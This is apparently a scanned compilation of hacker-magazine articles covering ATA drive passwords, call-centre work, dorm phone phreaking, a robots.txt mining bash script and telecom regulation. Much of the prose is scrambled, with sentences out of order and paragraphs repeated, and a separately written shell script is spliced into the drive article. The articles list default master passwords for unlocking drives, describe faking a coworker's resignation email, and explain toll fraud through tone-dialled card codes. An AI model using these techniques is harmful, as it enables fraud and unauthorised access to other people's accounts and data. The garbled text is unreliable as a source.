THE HACKER DIGEST - VOLUME 26
Year 26
With this issue we start our second quarter century of publishing. And that means a lot more than most people can understand. And we’re as shocked about that as anyone. increasingly.
And. So what is different today? Well. computers. it wouldn’t be much fun if we lost the “outcast” image and became entirely socially acceptable. or other such term used by those beholden to greater forces. It speaks to the power of the press and the willingness of individuals to seek out alternative perspectives and embrace new ideas. For whatever reason. But that overall hacker spirit has managed to live on and continues to morph into new and fascinating landscapes. But there are some things that. We’re quite comfortable in that position. Quite frankly. inspires us to keep going and to embark on new projects and adventures. What got us into this was the passion. just as we believe that there will always be places
While we have resisted the desire to go mainstream (which wasn’t all that hard for us). others have come in and relived it. And while some of us have lost that particular passion and moved on to something else. the small and enthusiastic band of online enthusiasts . There were few bridges between the emerging online world and the “real” world of print. while different in composition. while a quarter of a century sounds like a long time. we never thought this would happen or even that this kind of a response was possible. It’s not just about numbers. market share. There are those who believe that the time of the printed word is done. Something else that has held over the last 25 years is our reader base. without fear of hurting our position. we strongly believe that nothing can ever truly replace a publication in print. we retain the ability to analytically judge what’s going on around us. we find ourselves still thought of as the odd kid on the block. It started with a couple of dozen readers who shared it and spread to so many more. And we need to move along on this journey or risk becoming irrelevant or obsolete. careers. And that. One is our place in the world. We’ve certainly had our share of opportunities to change the direction and focus of our publication. Again. And while we agree that being on the net is vital to any entity wishing to stay in touch with the world around them. nobody else was publishing a regular journal on hacking or the specific security issues of telephones and. we managed to open up a whole lot of eyes that might never have learned of this world through the unique perspective of the inquisitive hacker. albeit with different ingredients. We started publishing back in 1984 because it seemed like a good idea at the time. retain the same basic structure as they did back in our founding days. which has never been our prime motivator. obviously everything is. all changed to the point of being unrecognizable.
But our naive and simplistic rationale concluded that it then wouldn’t be our publication. it’s really quite surprising how quickly it all seemed to unfold. The magnitude of that accomplishment continues to surprise us as we hear repeated testaments from readers who tell us what a profound effect the words printed here have had on their development and. in many cases. The simplicity of the monolithic phone network. By never actually becoming enveloped by the system. By focusing on the former in the realm of the latter. in turn.

From our first days. locally-owned publication needs to disappear. This is where we admit to some concern.
called libraries that contain actual books. not completely for ourselves. newspapers will be downsized and even eliminated as their owners seek to streamline operations and maximize profits. at least. It would be wrong to ignore these advances or to portray them as if they were somehow a threat. Or an infinite number of Internet “radio stations” coming from personal computers without a single one comprised of a group of people working together to produce a unique voice. Sure. We must do the same today. We don’t presume to put ourselves on such a high level but we do recognize the potential peril to the world of publishing in general and how its demise would ultimately hurt so many more than ourselves or our unique audience. at least not without substantially crimping their style. We think it’s truly amazing that virtually anyone can put up a web page and express themselves. or to remix a Beatles song. but because people think the same material can be found online. It’s not simply because we’re a part of that world. Most of us have seen this sort of thing happen before for varying reasons. telling stories that most anyone could appreciate and thus be drawn into the hacker experience. The many zines that we’ve come to share newsstands with all have their own unique base of supporters and they simply can’t be propped up with advertising dollars. As members of the publishing community. but for alternative media in general. It’s called information overload. And that’s really the way it should be. But with this ease comes a tremendous glut of information. The fact is it can’t. not because there’s no audience. The concern here is that we not embrace something so completely that we let something else fall into oblivion. Not entirely. That’s not at all how we feel. And it isn’t always pretty. to write an alternate ending to a Shakespeare play. true advancement will have been achieved. 
When such works of art become obscured by the cacophony of modifications and second opinions. Alternative. we see firsthand the result of such supposedly forward thinking on truly alternative voices. That’s a form of speech that simply wasn’t there a couple of decades ago. in our case. It’s the thought that true publishing is destined for extinction that naturally has us a bit peeved. When each of these worlds helps to strengthen the other. which makes the whole thing more of a labor of love than anything else. which is a normal part of the operating environment. But no community-supported. our magic has come from mixing worlds . then the die has been cast. Unless those supporters are disappearing for the wrong reasons. And while it can be supplemented with the blogosphere and instant messaging and constant status updates through one resource or another. in so doing. mixing the technical with the non-technical and. so much that it can make people quickly get sick of it all. And what is often lost in the process is the collaborative effort that’s quite unique to the production of an actual publication. True. If that support isn’t there or if control is lost to someone without actual ties to the readers. The mainstream media will never have a problem finding a way to survive because of their huge advertising support. mixing the new advances of technology with the older traditions. Lose the supporters and the publication ceases. Everyone in the publishing world has felt something of a decline. we all lose out and risk becoming mired in mediocrity.
It’s the equivalent of everyone composing their own computer-generated music and nobody wanting to be in a band. there can never be a substitute for a final copy of a piece of work. noncommercial publications have always had to struggle. It’s because we’re seeing up close how weaker publications are disappearing from the shelves. And if there’s one thing history has taught us over the eons is that the printed word survives the test of time. we have the ability to Photoshop a Rembrandt.

these must be done with third-party utilities such as hdparm on Linux or atapwd.exe. and the ability to erase all the data on the drive. The owner’s manual claimed that “if one were to lose his Master Password and his User Password. The utility you use to change the password determines what the new revision code will be. the master password can be used to change the user password if it has been forgotten. change or remove passwords.
the master password cannot be used to unlock the drive or change the user password. The current version of the Linux hdparm utility sets the revision code to 0xff11 (65297). this is actually a useful feature since it prevents malicious software from setting a hard drive password without the user’s knowledge. When the user password is set. All of these features are explained below. you will likely have to move the drive into another computer in order to erase it. only changed. as few desktop BIOSes issue the SECURITY FREEZE LOCK. the drive will be locked at power-on or reset. or erase the drive. it will always return 0x0000 (0) or 0xffff (65535). the FBI was able to bypass the drive password with no trouble at all and access all of his (legal) porn and his e-mail to his attorney. Try using a desktop computer. ATA drives allow two 32-byte passwords to be set. If a drive doesn’t support master password revision codes. both using the SECURITY SET PASSWORD command. It can also be used to unlock the drive. But when he was arrested in 2004 on firearms charges. it must be power cycled or hardware reset to return to normal operation. The system BIOS only allows the user password to be set. whether the freeze lock is set. as its name implies. Michael Crooker brought home his shiny new Compaq Presario notebook computer with a new feature called DriveLock which. The Linux hdparm -I command will tell you if your drive supports the ATA Security Mode feature set and the enhanced security erase. A similar feature set is available for SCSI drives.
ATA Security Exposed
by Michael Hampton Homeland Stupidity
In 2002. The user password can be removed with the
ATA Security Overview
Hard Drive Passwords
SECURITY DISABLE PASSWORD command. In the Maximum level. From the factory the revision code is 0xfffe (65534). but almost no SCSI drives implement it. Many notebook BIOSes send the SECURITY FREEZE LOCK command during the power-on self test. If the drive is frozen. available at: http://tinyurl. and will not respond to commands to read or write data. on a DOS boot disk. ATA drives have two master password security levels: High and Maximum. locks the hard drive until the proper password is given. The master password cannot be removed. and each drive manufacturer ships drives with a default master password set at the factory. Once the drive is unlocked. The user password must be supplied at power on to unlock the drive. or change the master password and security level. The ATA Security Mode feature set provides two major features: the ability to lock the drive using passwords. The system BIOS does this by issuing the SECURITY UNLOCK command. the SECURITY FREEZE LOCK command can be used to disable any commands which would lock the drive. and whether the master password has been changed from the factory default. depending on the utility you use.com/atapwd When the master password is changed. It can only be used to erase the user password along with all the user data on the disk. If your BIOS does this. it will be padded with either spaces or NULs (0x00). it doesn’t provide a function to set either the master password or the Maximum security level. then the hard drive is useless and the data cannot be resurrected even by Compaq’s headquarters staff. If a password shorter than 32 bytes is supplied. In the High level. While it can be annoying. making it impossible to set passwords or erase a drive from within the operating system. DriveLock was the brand name for a part of the ATA Security Mode feature set. and virtually every IDE/ATA/SATA drive manufactured since 2000 has it. a user password and a master password. the master password revision code will also be changed. 
Crooker sued Hewlett-Packard for false advertising and eventually settled out of court.

Even the supposedly DoD-approved 35 pass wipe isn’t good enough for the government anymore. In the enhanced mode. either the user password or the master password must be provided. Even if it does.) In addition. they’re now using ATA enhanced secure erase to decommission hard drives. the drive is erased with vendor-specific patterns in order to prevent forensic recovery of the drive. enhanced mode also erases sectors which were marked bad and reallocated.
Conclusion
If a user password has been set. which varies by drive vendor and sometimes by drive model. shared only with law enforcement and some data recovery companies. This allows access to the drive service area and is the method used by the Vogon Password Cracker Pod at: http://www.vogon-investigation.com/password-cracker.htm. Setting a hard drive password seems pointless in these days of widespread full disk encryption. use HDDErase.exe in DOS. available at: http://cmrr.ucsd.edu/people/Hughes/SecureErase.shtml or hdparm --security-erase-enhanced in Linux. To prevent accidental erasure. (http://tinyurl.com/cmrrse) to secure erase a hard drive is two random writes. There is no defense against this attack except for full-disk encryption. and other vendor-specific goodies. The master password is set to a factory default. Erasing the drive also erases any user password. which is available with most Linux distributions and the expensive versions of Windows Vista. Most newer drives also support an enhanced mode for SECURITY ERASE UNIT. Most law enforcement forensic tools and data recovery companies use the default master passwords to access locked hard drives. Both the user password and master password are written to the hard drive service area. but then don’t forget your user password! You may be able to find a master password for your drive by using Google. To issue the secure erase commands and actually destroy all the data on your hard drive beyond all possibility of recovery. which can still be done no matter how many times you overwrite your disk using Darik’s Boot and Nuke or other traditional hard drive erase utilities. If you need to erase many drives. If you want to know how it’s done. geometry information. The service area is different from the Host Protected Area. Most manufacturers won’t even admit that such a mode exists. This can be prevented by changing the master password. a special area on the disk which is normally inaccessible.
Dead On Demand makes a product called Digital Shredder. available at http://www.deadondemand.com. the command must be preceded with a SECURITY ERASE PREPARE command. who can get into the drive in seconds. When a drive receives the SECURITY ERASE UNIT command it will immediately begin erasing user areas of the drive. (You don’t have to write 35 passes of anything to a modern hard drive. This prevents using a scanning magnetoresistive microscope (the most exotic and expensive way to read data from a disk) to read data from the track edges. This area also stores the drive firmware. which does nothing but issue SECURITY ERASE UNIT commands to any drive plugged into it. due to the encoding scheme and track density. they can send it to the FBI. Yet the ATA enhanced secure erase facility is believed to be the most secure way to wipe a drive clean. each of which “is offset off-track opposite to the other by at least 10% of the track pitch.” but it isn’t likely to keep out your local police. so you can’t gain access to it by exposing the HPA. overwriting them with logical zeroes. try studying hard drive firmware update utilities. It can erase up to three drives at a time and supports hot plugging drives. because the firmware is stored in the service area along with the passwords.
This is the most interesting part of the ATA Security Mode feature set. You should be. two passes done a certain way are sufficient. The method to enter factory mode is different for each vendor and is a closely guarded secret. Some master passwords known to be in use are (without quotes):
“WDCWDCWDCWDCWDCWDCWDCWDCWDCWDCWD” “BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB” “tttttttttttttttttttttttttttttttt” “Seagate “ “Maxtor “ “Maxtor INIT SECURITY TEST STEP “ “Maxtor” (padded with 0x00)
32 spaces (0x20) 32 (0xff) “XBOXSCENE” and “TEAMASSEMBLY” (for Xbox drives)
Data Recovery
Setting a hard drive password will keep out your little sister.
Security Erase
Causing the hard drive to enter a special factory mode is one of two ways that law enforcement and data recovery companies access locked drives. The pattern specified by the Center for Magnetic Recording Research (http://tinyurl.com/cmrrse). Some hard drives now ship with hardware-based full disk encryption as well. too.
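The article tells you to run hdparm -I to learn whether a drive supports the ATA Security Mode feature set and what state it is in. The POSIX shell script below is an added example, not the author's code: it reads the Security section of hdparm -I output and reports whether a user password is set, whether the drive is locked or frozen, whether the master password revision code is still the factory value the article names, and whether enhanced erase is supported. The sample output is constructed (not captured from a real drive) and the function names are my own.

```shell
#!/bin/sh
# Added example: interpret the "Security:" section of `hdparm -I` output.
# Constructed sample of that section as hdparm prints it: each feature line
# is indented, and carries a leading "not" when the corresponding bit is clear.
SAMPLE_HDPARM_I=$(
    printf 'Commands/features:\n'
    printf '\tEnabled\tSupported:\n'
    printf '\t   *\tSMART feature set\n'
    printf 'Security: \n'
    printf '\tMaster password revision code = 65534\n'
    printf '\t\tsupported\n'
    printf '\tnot\tenabled\n'
    printf '\tnot\tlocked\n'
    printf '\t\tfrozen\n'
    printf '\tnot\texpired: security count\n'
    printf '\t\tsupported: enhanced erase\n'
    printf '\t2min for SECURITY ERASE UNIT. 2min for ENHANCED SECURITY ERASE UNIT.\n'
    printf 'Checksum: correct\n'
)

# Print "yes" if the named feature line appears without a leading "not",
# "no" if it appears with one, "unknown" if the line is absent from the
# Security section.  $1 = hdparm -I output, $2 = exact feature text
# (e.g. enabled, frozen, "supported: enhanced erase").
ata_security_flag() {
    printf '%s\n' "$1" | awk -v feat="$2" '
        /^Security:/ { insec = 1; next }
        insec && /^[^ \t]/ { insec = 0 }      # next column-0 heading ends the section
        insec {
            line = $0
            sub(/^[ \t]+/, "", line)           # drop the indentation
            neg = 0
            if (line ~ /^not[ \t]+/) { neg = 1; sub(/^not[ \t]+/, "", line) }
            if (line == feat) { print (neg ? "no" : "yes"); found = 1; exit }
        }
        END { if (!found) print "unknown" }'
}

# Print the master password revision code as hdparm shows it (decimal),
# or "unknown" if the line is absent.
ata_master_revision() {
    printf '%s\n' "$1" | awk '
        /Master password revision code/ { sub(/.*= */, ""); print; found = 1; exit }
        END { if (!found) print "unknown" }'
}

# Classify the revision code with the values the article gives: 0xfffe (65534)
# is the factory default, 0 or 0xffff means the drive does not report revisions,
# anything else means the master password was changed (Linux hdparm writes
# 0xff11, i.e. 65297).
ata_master_state() {
    case "$1" in
        65534)   echo "factory-default" ;;
        0|65535) echo "not-reported" ;;
        unknown) echo "unknown" ;;
        *)       echo "changed" ;;
    esac
}

# One-line summary of the drive's security state.  On a live system (root):
#   ata_security_report "$(hdparm -I /dev/sdX)"
ata_security_report() {
    rev=$(ata_master_revision "$1")
    printf 'security_supported=%s password_set=%s locked=%s frozen=%s master_password=%s enhanced_erase=%s\n' \
        "$(ata_security_flag "$1" supported)" \
        "$(ata_security_flag "$1" enabled)" \
        "$(ata_security_flag "$1" locked)" \
        "$(ata_security_flag "$1" frozen)" \
        "$(ata_master_state "$rev")" \
        "$(ata_security_flag "$1" 'supported: enhanced erase')"
}

ata_security_report "$SAMPLE_HDPARM_I"
```

A frozen drive (as most notebook BIOSes leave it) reports frozen=yes, which is why the article says you may have to move the drive to another machine before SECURITY ERASE UNIT can be issued.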

soul sucking places you can be. And I have a few tips to pass along as well. The longer the agent deals with one cx. Cx: “I’m pissed. and it doesn’t have anything to do with actually resolving the problem that the cx has. the more the company is “losing” to that cx because the company has to pay you to help him.) Some of the ways that the company accomplishes this is to hire people with no tech knowledge but lots of customer service skills.. I thought. what about quality? Isn’t cx satisfaction an important metric? Well. You start with being dumb. Here’s the problem: Basic economics 101. you’re told all the things that sound good. the cx is told to call your counterpart at Dell where his support bounds will say system recovery. and I don’t want to hear I’m sorry!” Agent: “ I’m sorry you think we suck. Solving the problem would be first call resolution. After that.. I was hired to do tech support for a large ISP. I mean support bounds. pirate material. This is the single most important metric the agent has. This is the outsourced call center. both on the call itself and taking notes. Empathize with the cx. Having spent as long as I have in one of these pits. which is almost never talked about. The company’s idea of “helping” is defined as referring the cx somewhere where his problems won’t cost the company money. Summer ‘08. the less you know.. is the total talk time. it’s free tech support. However. I have had cx call in and ask how to burn CDs. the sooner you’ve “exhausted all possible” troubleshooting steps. There are many tools that you’re expected to use to cut down your talk time. as I believe helping someone involves actually knowing something and then sharing that knowledge with the other person. Tech support is a money losing venture to the ISP. and access porn. the call center production floor. the better. I want it fixed. that’s easy. as customer support for the ISP. What makes these people call their ISP for this is still beyond me except that. 
Quality is based on saying certain things in response to the cx. Classic example. where you seek out islands of sanity and watch for the enemy from without and within. and they think that we have to help. These are people that they can train from the ground up to have no knowledge of anything remotely useful about the service. In this
You. then reality hits you upside the head. The customer (referred to as cx for short) is your top priority. your stuff sucks. This goes against my own idea of helping. Agents are punished for giving helpful hints to the cx. The floor is. oh yeah..” Repeat till cx hangs up. So the faster you “help” him. set up a local network. You see. They love that word. from the agent’s bonus to his ability to keep his job. row after row of computers with headsets where you are expecting to “help” people. cannot recommend a change to the OS. don’t tell the cx. Sounds good. of course. Hence the agent metric of a “talk time.
Outsourced
by Witchlight
I’ve just finished five and a half long years in one of the most depressing. The other big method of reining in talk times is to have very tight handcuffs.” The amount of time an agent spends on the phone with one cx. It doesn’t actually have anything to do with meeting the cx needs. that’s an OS issue and not an ISP setting. It’s a place where the job you’re hired to do is not what you’re asked to do. So. I’ve learned quite a few things that I’d like to confess. Empathy. you escalate (see Hacking Society. So even if the reason the customer can’t get online is because they disabled the DHCP service in Windows and you know it. support bounds are a necessary evil.. Everything is based on this. Always do what’s best to help the cx. It’s a mantra to the point that you’d almost believe that they want you to care about the cx. In training.. The first thing you need to learn about these places is that the job you’re hired to do has nothing to do with what you’ll actually be asked to do. These people are pleasant in nature and can make you feel good about the fact they are not helping you because they empathize with you as they don’t know anything about the service either. and you’re on the floor. I’ll bridge my tech and my service skills and help people fix problems.

we had to say we’d be happy to help with that. So if you were to email a resignation letter to HR on Friday (HR doesn’t work weekends) as someone who was off Thursday and Friday. “I’ll be happy to help with that!” …awkward. I once asked a cx how I could help and she responded “ I’m screwed!” to which I had to say. once had a woman say to her. so even if this works at your company. for the most part. In our center. The one that got a lot of play where I worked was the simple assurance to help statement. this would be really.
Even when we couldn’t. but quality guidelines say that the agent MUST apologize whenever a cx expresses irritation or dissatisfaction. When we asked the cx how we could help them today. and cancel requests.” Security would then ask the person to leave. scripts can also be a way for the agent to tell you something he isn’t supposed to tell you. However. We used a site on the LAN for time off requests. All you had to do was send an email that said “I quit” that included the employee’s number. each agent’s names and employee number was listed. as there would be no one in HR to speak to until the following Monday. He can’t just blurt it out because of security reasons. he wouldn’t check again and would not show up that day either. an agent would get only four calls qualitied in a month. the URL had the request number in it. making a lot of personal information (medical. There are also a number of security holes in the internal system of the ISP where I worked. What you’ll need to do is call your OEM. These can be fun to play with. There was also a place where people could explain why they wanted the day off. In it. however. and if you entered a different request number. Even if you followed policy. Watch your back. However. My girlfriend. There are. The whole setup is meant not to help people but to get rid of them. once a person saw his request approved. If at the end of the month the agent has four good qualities and needs to shave a few seconds off his talk time for a better bonus. the more likely the customer is to get frustrated and hang up. All you had to do to quit was send an email saying that you quit. It would auto sign-in to your account based on your system logon. “I’d be happy to help. For example. Normally. the hacker? Well. You could request days off. The check-in system used each day by the agents made it very easy to find out a fellow agent’s employee number. and so they didn’t have email accounts.
End of the month can be the best time to do a little social engineering. So. This would leave the company short. it may be because he is trying to point out a loophole in the system. The people you work with are. you know the old joke about how cops will write more tickets at the end of the month to make a quota? Guess what. no matter what the cx said. Agents tend to treat this more like a game. but rocks). it happens in call centers. if you wanted to take a day off on a day that already had the maximum number of vacation requests. This email was not sent from any company email account that would verify your ID. the agent does exactly what will irritate the cx more.. An email from any email address would work. and leave you the day off. it would open that request without making sure you were the user who made that request.VOLUME 26
example. What does this mean to you. but rocks). Even if you followed policy. the agent does exactly what will irritate the cx more.. An email from any email address would work. and leave you the day off. it would open that request without making sure you were the user who made that request. then that employee would show up on Saturday and be locked out. get out. please don’t do it. “Thank you for making me feel stupid. get the other agent in trouble. My advice is: if you work in one of these places. then that employee would show up on Saturday and be locked out. the company is always looking for a scapegoat when a cx gets really agitated. they keep you sane. Friends are few in these places. dumber than rocks (nice shiny rocks. The more we apologize. having already “quit. he doesn’t really have to worry about getting a good talk time and can go way out of bounds to get you all the info you might need. really mean to do to someone. “You’re welcome!” However. and he isn’t going to get a bonus anyway. a fellow agent. This would free up the hours so you could take that day off. they will hang you. The quitting process where I worked had another major hole.. Following the strict script also sometimes forced us to give inappropriate responses. Agents didn’t need email access at the company. view previous request. if the agent bombs a quality. If you notice an agent explaining certain policies. too. you’d better believe he’ll reset that pass for you without checking if you’re the account holder. Now.” This could sometimes get awkward. thus accomplishing both high quality scores and lower talk time! Some roles have tight scripts that agents have to follow. so hold on to the ones you have. legal) available for anyone to view.

Instead. with LCD screens. I would try to concentrate on only the one tone. only without the last seven digits for the old card we used to use! They were now using the same basic code for everyone. slowly but surely.” cards originally created for our Swiss public phones (the LCD screen’s main purpose was to let you know how fast your money was being swallowed up). and it turned out it was the same code as before. I punched it in manually and. but that now. if I picked up my other phone to hear what was going on on the line. You could get this card at the front desk for a monthly fee. They installed new phones. So far. Within about 10 minutes. There was no longer any need to know who was calling out.. I programmed the code into my phone’s memory. I could hear numbers being dialed at a rapid rate by the first phone. we had a little device that would generate the tones of a touch-tone keypad (this was useful in case the phone we were calling from was a rotary phone). since the phone took care of the billing itself. lo and behold..
I was no longer being charged to make calls. First. I would just hit one of the memory combinations. the freedom to continue to choose through which phone company I wanted to make my calls. but convenience. and heard that same familiar dialing sound. I hated the new system. Well. along with the prefix for the phone company I wanted to use and the person I wanted to reach. needless to say. writing down the entire melody for both tones (as I recall. I decided to figure out what this number was that I heard being dialed when I inserted my phone card. Playing with this little device as a kid had taught me that tone dial phones send out a dual tone for each number pressed on the keypad. When I inserted the card into the pre-installed phone to dial out. pushed my newly acquired “taxcard” into the new phone. It was a big gain in convenience. I was taking advantage of the situation. I could make outgoing calls! I soon figured out that the last seven digits or so were nothing else than a bunch of zeros followed by the two-digit number of my phone card. I was very low-tech in that period (flirting with the idea of entering a monastery). in this case. Put briefly. and it was because of this second phone that I made the following discovery. Hmm. In a certain sense. however. costing about twice as much as before. I connected my second phone.
Annoying Phones At The Dorm
by Chris Dickinson
I was around 23 years old and studying theology at a Swiss university. since I would be billed twice.THE HACKER DIGEST . it was a 13-digit number). It no longer made any sense to use my pre-programmed codes to choose another provider. This was what was granting the access to make outbound calls. the phone company decided that we needed a new system. it was time for another tone analysis. although it didn’t occur to me at the time. This is what told the system whom to bill at the end of the month. I worked out the new code. For example. So. I did this by repeatedly inserting my phone card into the pre-installed phone and listening to the dual tone melody on the other phone. it dawned upon me that I had not only figured out how to make calls without using a card. Combining the two melodies gave me the position on the keypad matrix of each number being dialed. and then on the other. But I had a second phone. we had an answering machine at my parents’ house. In order to call home from vacation and remotely navigate through the messages we had received. instead of using that card and then dialing another 15 numbers to call my parents. When I was a kid. I was curious how they had changed the technology for granting access for outbound calls. I had the code. calling without a card actually meant calling for free! Again. I realized that by using other peoples’ card numbers I could very easily make phone calls on their bills. But. the point was not to make someone else pay for my calls. and you would receive a bill at the end of every month for the calls made. Calls were billed straight to the card and were expensive. so good. except for one peculiar feature: you needed to insert a special card if you wanted to make outbound calls. But that wasn’t the point. The room at my dorm had a very simple phone.

then again. cool boy tools. Instead. txt please examine for further detail” I don’t want to go examine it. He told me that what I was doing was fraud and a criminal act. I. and it was time to find a better solution. and they expressed their surprise at my criminal activities. This was the reason for their visit. I. who in turn was asked to send a letter of complaint to my superiors in the church hierarchy (those responsible for getting me a job in the church later on. confidential. something that always bugged me about Nessus reports was the little line “server contains a robots. as well. robots. Since I had unplugged the phone. content that is private. decided that they must have figured out what I was doing. They could silently communicate with the company. I graduated but decided not to work as a minister after all. came to me with the following proposal. however. worked out a plan for combined phone and internet access for all rooms (with another company. etc. but. The story had one more interesting turn. using the big. Nessus is a good place to start (if you didn’t know) and. in the case of 2600 readers. asking how to get some tool to work in Windows. The representative for that phone company sent a nasty letter to the dorm’s board of directors (the dorm was owned by the Catholic church). They wanted to take a look at my phone (which was unplugged and stored away somewhere).
robots. together with a computer-savvy friend. A practice that is not as prevalent as it was back in the good old days is to hide folders from Google. But who is to say that the hackoogle search
. that I was not actually making free calls. I proudly accepted the offer and. what a compiler and make are used for. with robots. which seems to suit me a lot better. However. get on with it! Now. yes. the director of the dorm. far too quickly. or otherwise shouldn’t be on the web publicly. About a year later.txt was (and is) a file used for setting rules for user agents in use of the site. I’m lazy.com
Hackers are lazy. while I was taking an early afternoon nap. Meanwhile. I am. who cares? I think it must all be a ego thing — I was that dumb kid some years ago. allowing the company to do nightly software upgrades to the phones. so I thought at the time). The world has taken me to penetration testing. specifically where not to look. txt. Within a few minutes I was giving them a demonstration of how I could make free phone calls without the taxcard. This’ll be followed up the proverbial reply from the “DarkLord” (you know. the guy with the 3000 post count) who locks the thread with a “learn to Google” reply. Particularly search engines — people didn’t want search engines to index their entire site and spit out content that is dynamic or. but I was unhappy about the letter nonetheless. What ensued were a few talks with my superiors and the director of the dorm. In brief. a quick little history lesson. nor will he take the time to look up. This was where I had gotten sloppy. who knew me only because of this issue. It turned out not to be a big deal. The nearly 100 students at the dorm all hated the new system. I opened the door sleepily and found myself talking not only to the janitor. etc. the phone company thought there was a problem with it. I heard the janitor knock on my door. only knowing little more than how to break it.. The janitor was impressed. the representative was not. why is this so horrible? Sure.txt Mining Script For The Lazy
by KellyKeeton.com
I was very happy with my new code until one day. It wasn’t being used. it runs on Windows. I like to have a tool to do everything for me. How often do you troll a hacker bbs and find the post “HELP MUST GET WORKING IN WINDOWZ”? No doubt from a script kiddy who has no idea. So first. Google is friendly and they play by the rules. people would stoop to such levels as that.

/ftp.Robots. These are great places to start mining around for default pages that will let you download full copies of an application without paying for it.html echo report written to $(pwd)/robots_$1.KellyKeeton.sh example.
The basics of looking at a robots.html #done else #wget didnt pull the file echo $1 has no robots.*\)/ \r\n#\1<br>/" robots_$1.txt report generator echo will download and convert the robots.txt else mv robots.txt robots_$1.2600. or /registered into the robots.06 # dont forget to chmod 755 robotReporter.html #parse user agent lines sed -i "/llow:/s/\/\(.txt echo on a domain to a HTML clickable map.txt clickable ➥ reports # created by KellyKeeton. It’s very simple. My personal favorite are smaller software firms that put /download. Not like anyone here would do that. say F. Cool. then #deal with command line nulls echo echo robotReporter$version .VOLUME 26
engine wont just pop up. start scouring the domain for anything tasty.sh or there will be no 31337 ➥ h4x0r1ng if [ "$1" = "" ].com/ robots.txt -o /dev/nul #download the robots. those people that put /CVS into it. Well.html ➥ # parse the sitemap lines sed -i "/-agent:/s/$/<br>/" robots_$1. again.com</a>" >> robots_$1.com\">KellyKeeton.*\)/ <a href=\"\1\">\1<\/a> <br>/" robots_$1.THE HACKER DIGEST . but I hope to make the day much simpler for someone somewhere.txt robots_$1.html # parse comments sed -i "/Sitemap:/s/: \(.html # parse all Dis/Allow lines echo "<br> Report ran on $(date +%c) with host <a href=\"http://$1\">$1</a> ➥<br> Created with robotReporter $version .txt echo "###Created with robotReporter $version .txt echo exit fi wget -m -nd HTTP://$1/robots.a script for creating web server robot. then # dont delete the robots.txt are very simple.txt file if [ -f robots.txt echo "###EOF Created on $(date +%c) with host $1" >> robots_$1. file.txt ].U.kellykeeton. this is nice but you must then cut and paste the results onto the URL bar to see the goodies.com/code/
. how is this robots. robots. I wrote this script.
#!/bin/bash # robotRepoprter. Who needs that? I have come to the rescue of the script kiddy — I recently broke my ankle and. or tab all over.txt.txt to report on. fi #EOF
The script mentioned in this article can be downloaded from the 2600 Code Repository at http://www.com -b echo echo -b keep orginal of the downloaded robots.txt good for them? Well.*\)/ <a href=\"http:\/\/$1\/\1\">\1<\/a> <br>/" robots_$1.html #parse user agent lines sed -i "/-delay:/s/$/<br>/" robots_$1.html mv robots.txt and any web browser will pull back the txt file.sh -. just putting HTML wrappers on things.txt.<a ➥href=\"http://www. index it.txt file cp robots.txt robots_$1.html fi #html generation using sed sed -i "s/#\(. echo echo Usage: robotReporter.com version=. then #if the file is there do it if [ "$2" = "-b" ]. Browse to http://example.com" >> robots_$1. or hit the back button. might be leaving the world a free copy of their code. and allowing people to search for juicy ‘nuggets’? Back to the 31337 web site operators. after getting frustrated with the motorcycle missions 40% of the way into GTA-IV.

Nearly every aspect of telephone service was once regulated. I’ll take you through the dank. change the rates as often as they like. Internet. though.my least favorite time of the year here in the Great Northwest. and welcome to the Central Office! I don’t have a cold but I’m sneezing.is strictly regulated by the PUC’s regulatory tariffs. Telephone service . Internet service. they generally do not conduct their business in secret. I could write a rant about the teenage heavy breathing I barely ever hear anymore during my “service monitoring” because the kids are skipping the talk and just sending compromising picture messages to just the two of them and the whole Internet. Services from your telephone company are largely regulated by tariffs. unlike the federal government. your only meaningful recourse is generally not to subscribe.THE HACKER DIGEST . but whether or not they have been granted this authority is in itself a secret. and they’re not accountable to the PUC for delivering any particular level of service quality. services are divided and catalogued as regulated and deregulated. So. the FCC regulates long distance telephone service. both at the federal and state level. which signals spring . long distance. They can charge whatever rates they like. VoIP. Here in my Central Office. cell phones.. Most states have not been as easily convinced as the federal government to give up regulatory authority within their jurisdictions and.S. the FBI has been granted de-facto regulatory power over the telephone system’s surveillance capability. most federal agencies have only token. and as they have exerted political control over the past eight years.VOLUME 26
Telecom Informer
by The Prophet
Hello. I could write a long rant about the pack of thieving raccoons that lives behind the fence and knocks over my garbage cans. Actually. It’s barely discernible from winter. the roots start attacking my sewer line. traditional telephone service remains a regulated utility. Trouble tickets on deregulated services almost never result in overtime. There’s a really tough enforcement mechanism for any failures. Regulated services are an entirely different matter. there has been a deliberate and substantial dismantling of nearly a century's worth of federal regulations on telephone service. In effect. ranging from directory assistance to the placement of telephone poles to the format of your bill. Telephone companies love deregulated services. but many other services (such as long distance. In fact. Ostensibly. and a handkerchief becomes a nearly permanent fixture on my nose. apart from one glaring exception (CALEA surveillance requirements). and I can work them more or less at my leisure (strictly within union work rules. except that everything starts blooming. As I’ve written previously. but tariffs are no longer reviewed or approved and are self-reported by the carriers on their own websites. which provides funding for network development in rural areas. The NSA has also (presumably) been granted secret powers to do secret things in secret facilities constructed at tandems across the U. of course). After all. Republicans generally oppose federal regulations. The telephone company publishes a service catalog for both regulated and unregulated services. like electric or gas utilities. However. which has seen increased regulatory activity. though. all of those things are still regulated.at least the ever-dwindling parts of it under state jurisdiction . rates .are regulated by the state Public Utilities Commission. and for regulated services it publishes tariffs. toothless enforcement mechanisms and commissioners are lap dogs of the industry. 
in keeping with my least favorite springtime things. If your phone company has accepted certain government funds. Instead. and most other ways of communicating are all but unregulated. if you aren’t satisfied with the service. dripping hallways of any regulated utility’s nemesis: the state public utility commission. it might also be regulated by the Department of Agriculture’s Rural Utilities Service (formerly known as the Rural Electrification Administration). Everything from the number of blocked circuits to outside plant demarcation points to billing practices . It is accountable for
. offer whatever promotions and marketing bundles they like. long distance carriers are accountable to themselves to self-report any lapses. That is. known as CALEA. and voicemail) are effectively not.and most importantly. Or about the gopher who pushes up little dirt mountains all over my lawn.

or an even cheaper and more obscure service called “Number Forwarding” that is the exact same thing minus a Yellow Pages listing. They can only do this once every two years. For example.wa.utc.VOLUME 26
delivering services exactly as advertised in the service catalog. long distance is . but only if you ask for them specifically. In general.AT&T tariff library • http://www22. These days. Drive carefully while sneezing from all the pollen. it’s time to bring this issue of the Telecom Informer to a close.att. you can blame the Public Utilities Commission for its placement!
